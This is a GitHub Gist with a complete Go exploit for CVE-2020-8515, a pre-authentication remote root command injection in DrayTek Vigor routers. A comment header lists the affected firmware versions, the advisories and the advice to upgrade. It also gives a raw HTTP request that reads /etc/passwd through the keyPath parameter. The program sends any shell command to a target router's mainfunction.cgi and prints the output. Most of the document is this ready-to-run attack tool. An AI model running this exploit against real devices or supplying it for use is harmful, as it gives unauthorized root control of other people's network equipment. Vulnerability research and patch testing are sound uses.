-
-
Save rmdavy/ef448b0835a17c09ba475cf3595e53c8 to your computer and use it in GitHub Desktop.
CVE-2020-8515: DrayTek pre-auth remote root RCE
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
/* | |
CVE-2020-8515: DrayTek pre-auth remote root RCE | |
Mon Mar 30 2020 - 0xsha.io | |
Affected: | |
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, | |
and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, | |
and 1.4.4_Beta | |
You should upgrade as soon as possible to 1.5.1 firmware or later | |
This issue has been fixed in Vigor3900/2960/300B v1.5.1. | |
read more : | |
https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html | |
https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/ | |
https://thehackernews.com/2020/03/draytek-network-hacking.html | |
https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ | |
exploiting using keyPath | |
POST /cgi-bin/mainfunction.cgi HTTP/1.1 | |
Host: 1.2.3.4 | |
Content-Length: 89 | |
Accept-Encoding: gzip, deflate | |
Accept-Language: en-US,en;q=0.9 | |
Connection: close | |
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a | |
*/ | |
import ( | |
"fmt" | |
"io/ioutil" | |
"net/http" | |
"net/url" | |
"os" | |
"strings" | |
) | |
func usage() { | |
fmt.Println("CVE-2020-8515 exploit by @0xsha ") | |
fmt.Println("Usage : " + os.Args[0] + " URL " + "command" ) | |
fmt.Println("E.G : " + os.Args[0] + " http://1.2.3.4 " + "\"uname -a\"" ) | |
} | |
func main() { | |
if len(os.Args) < 3 { | |
usage() | |
os.Exit(-1) | |
} | |
targetUrl := os.Args[1] | |
//cmd := "cat /etc/passwd" | |
cmd := os.Args[2] | |
// payload preparation | |
vulnerableFile := "/cgi-bin/mainfunction.cgi" | |
// specially crafted CMD | |
// action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a | |
payload :=`' | |
/bin/sh -c 'CMD' | |
'` | |
payload = strings.ReplaceAll(payload,"CMD", cmd) | |
bypass := strings.ReplaceAll(payload," ", "${IFS}") | |
//PostForm call url encoder internally | |
resp, err := http.PostForm(targetUrl+vulnerableFile , | |
url.Values{"action": {"login"}, "keyPath": {bypass} , "loginUser": {"a"}, "loginPwd": {"a"} }) | |
if err != nil{ | |
fmt.Println("error connecting host") | |
os.Exit(-1) | |
} | |
defer resp.Body.Close() | |
body, err := ioutil.ReadAll(resp.Body) | |
if err != nil{ | |
fmt.Println("error reading data") | |
os.Exit(-1) | |
} | |
fmt.Println(string(body)) | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment